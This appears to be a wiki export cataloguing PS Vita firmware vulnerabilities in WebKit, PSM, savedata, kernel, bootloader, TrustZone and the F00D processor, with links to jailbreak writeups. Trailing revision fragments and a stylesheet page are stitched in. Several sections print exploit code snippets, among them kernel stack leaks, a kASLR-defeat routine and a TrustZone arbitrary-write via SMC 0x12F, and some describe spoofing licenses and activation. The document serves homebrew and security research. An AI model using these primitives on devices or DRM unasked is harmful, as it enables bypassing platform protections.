<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many many people. Patched on FW 3.30.<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.50-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (Vita FW 3.30-3.71) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next kernel exploit, named 2050 and 2051.<br />
<br />
Working on <= 3.71. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevetheless, a set of tricks allow to install and use PSM on any PSVita on FW <=3.51.<br />
<br />
PSM apps can't work on FW >=3.52 because they are blacklisted in PSVita OS. This can be bypassed only with a kernel exploit and ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can so be installed using PKG Installer, or BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
PSM developper license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process, you just fuzz gamesaves by writing random stuff at random locations until you get a crash (best bet is extending strings and hope that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file and the game reads it line by line and copies them to a list of buffers. However it doesn't validate the length, thus if we put the delimiter \n far away such that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer is on stack, we can make it overwrite the return address and straightly execute our ROP chain. However it is on the data section, but luckily for us, the content after the buffer is actually the list that contained destinations for other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want and therefore enable us an arbitrary write primitive.<br />
<br />
Not patchable. Bittersmile game requires minimal FW ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC doesn’t sanitize check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can securize PSVita's store as much as they want, we will always be able to activate til PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof firmware version for bypassing FW Update popup, and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall number passed in R12 can overflow syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== syscall handler leaks syscall table vaddr ===<br />
<br />
When calling syscall, calling with invalid syscall id will end the svc interrupt without clearing vaddr in r0's syscall table.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in fself. Since at least firmware 1.030, it works only via webkit (not fself nor games but maybe ePSP or PSM) exploits.<br />
<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="C"><br />
// make a buffer, tagged with '0x66' bytes<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate kernel stack<br />
<br />
// kernel stack leak to outbuf<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or on FWs just before. These exploits are not usable on retail/testkit because the used functions are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparizon as signed integer ====<br />
<br />
At some point in memcpy function, the length is compared as signed integer. Hence a negative length will simply bypass the copy loop.<br />
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution we can mod eMMC MBR to change block size. However at this time yifan was trying to exploit it with an adjacent malloc (controlled_size) and couldn't find a way so he just left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL. A function does not check a error return: if it did then the corrupted value in buffer overflow would not have been used. And later on the field that was written was used in a separate call.<br />
<br />
It so allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [[File:Psvita_1.80_tz_nids.txt]]<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table). This results in TrustZone level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
To achieve code execution, it is needed to set dst to the SMC table address in order to plant 2 pointers (8=2*4 bytes).<br />
<br />
Patched somewhere around after 1.80 before 2.10.<br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
=== Boot ROM ===<br />
<br />
(2019-08-30) To be disclosed.<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== Heap buffer overflow in update_service_sm ===<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
Not patched yet (not sure).<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code> which is the uncached alias of <code>0x800000</code> (both are F00D-only private memory) and then later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are stale and therefore the memory is safe to reuse. Interrupts are disabled, so we cannot use those. Exceptions, however cannot be disabled in hardware. Unfortunately, there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe to re-use the buffer). Below is a summary of all the exceptions and why they are not possible.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
However, through [[Glitching]], we can inject a fault in either the decoding or execution units of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as a F00D exception handler table that all points to our payload, we can execute F00D code at bootrom time (before bootrom is unmapped). This is a very desirable glitching target because it almost requires no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style of glitch attacks. In practice, we found this target to have an insanely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because at most 1 eMMC block must be read. The second path is used in early boot to read the [[Secure Kernel]] ENC which is loaded from the [[SLB2]] partition by ARM TZ processor to volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=File:Psvita_1.80_tz_nids.txt&diff=11478File:Psvita 1.80 tz nids.txt2019-08-31T15:41:11Z<p>Xyz: </p>
<hr />
<div></div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=MediaWiki:Common.css&diff=11477MediaWiki:Common.css2019-08-31T15:39:22Z<p>Xyz: </p>
<hr />
<div>/* CSS placed here will be applied to all skins */<br />
/* Default style for navigation boxes */<br />
.navbox { /* Navbox container style */<br />
border: 1px solid #aaa;<br />
width: 100%;<br />
margin: auto;<br />
clear: both;<br />
font-size: 88%;<br />
text-align: center;<br />
padding: 1px;<br />
}<br />
.navbox-inner,<br />
.navbox-subgroup {<br />
width: 100%;<br />
}<br />
.navbox-group,<br />
.navbox-title,<br />
.navbox-abovebelow {<br />
padding: 0.25em 1em; /* Title, group and above/below styles */<br />
line-height: 1.5em;<br />
text-align: center;<br />
}<br />
th.navbox-group { /* Group style */<br />
white-space: nowrap;<br />
/* @noflip */<br />
text-align: right;<br />
}<br />
.navbox,<br />
.navbox-subgroup {<br />
background: #fdfdfd; /* Background color */<br />
}<br />
.navbox-list {<br />
line-height: 1.8em;<br />
border-color: #fdfdfd; /* Must match background color */<br />
}<br />
.navbox th,<br />
.navbox-title {<br />
background: #ccccff; /* Level 1 color */<br />
}<br />
.navbox-abovebelow,<br />
th.navbox-group,<br />
.navbox-subgroup .navbox-title {<br />
background: #ddddff; /* Level 2 color */<br />
}<br />
.navbox-subgroup .navbox-group,<br />
.navbox-subgroup .navbox-abovebelow {<br />
background: #e6e6ff; /* Level 3 color */<br />
}<br />
.navbox-even {<br />
background: #f7f7f7; /* Even row striping */<br />
}<br />
.navbox-odd {<br />
background: transparent; /* Odd row striping */<br />
}<br />
table.navbox + table.navbox { /* Single pixel border between adjacent navboxes */<br />
margin-top: -1px; /* (doesn't work for IE6, but that's okay) */<br />
}<br />
.navbox .hlist td dl,<br />
.navbox .hlist td ol,<br />
.navbox .hlist td ul,<br />
.navbox td.hlist dl,<br />
.navbox td.hlist ol,<br />
.navbox td.hlist ul {<br />
padding: 0.125em 0; /* Adjust hlist padding in navboxes */<br />
}<br />
ol + table.navbox,<br />
ul + table.navbox {<br />
margin-top: 0.5em; /* Prevent lists from clinging to navboxes */<br />
}<br />
<br />
/* Default styling for Navbar template */<br />
.navbar {<br />
display: inline;<br />
font-size: 88%;<br />
font-weight: normal;<br />
}<br />
.navbar ul {<br />
display: inline;<br />
white-space: nowrap;<br />
}<br />
.navbar li {<br />
word-spacing: -0.125em;<br />
}<br />
.navbar.mini li span {<br />
font-variant: small-caps;<br />
}<br />
/* Navbar styling when nested in infobox and navbox */<br />
.infobox .navbar {<br />
font-size: 100%;<br />
}<br />
.navbox .navbar {<br />
display: block;<br />
font-size: 100%;<br />
}<br />
.navbox-title .navbar {<br />
/* @noflip */<br />
float: left;<br />
/* @noflip */<br />
text-align: left;<br />
/* @noflip */<br />
margin-right: 0.5em;<br />
width: 6em;<br />
}<br />
<br />
/* 'show'/'hide' buttons created dynamically by the CollapsibleTables javascript<br />
in [[MediaWiki:Common.js]] are styled here so they can be customised. */<br />
.collapseButton {<br />
/* @noflip */<br />
float: right;<br />
font-weight: normal;<br />
/* @noflip */<br />
margin-left: 0.5em;<br />
/* @noflip */<br />
text-align: right;<br />
width: auto;<br />
}<br />
/* In navboxes, the show/hide button balances the v·d·e links<br />
from [[Template:Navbar]], so they need to be the same width. */<br />
.navbox .collapseButton {<br />
width: 6em;<br />
}<br />
<br />
/* Styling for JQuery makeCollapsible, matching that of collapseButton */<br />
.mw-collapsible-toggle {<br />
font-weight: normal;<br />
/* @noflip */<br />
text-align: right;<br />
}<br />
.navbox .mw-collapsible-toggle {<br />
width: 6em;<br />
}<br />
<br />
pre code {<br />
border: none;<br />
}</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11476Vulnerabilities2019-08-31T01:42:47Z<p>Xyz: /* Hardware */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz, in order HENkaku to be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
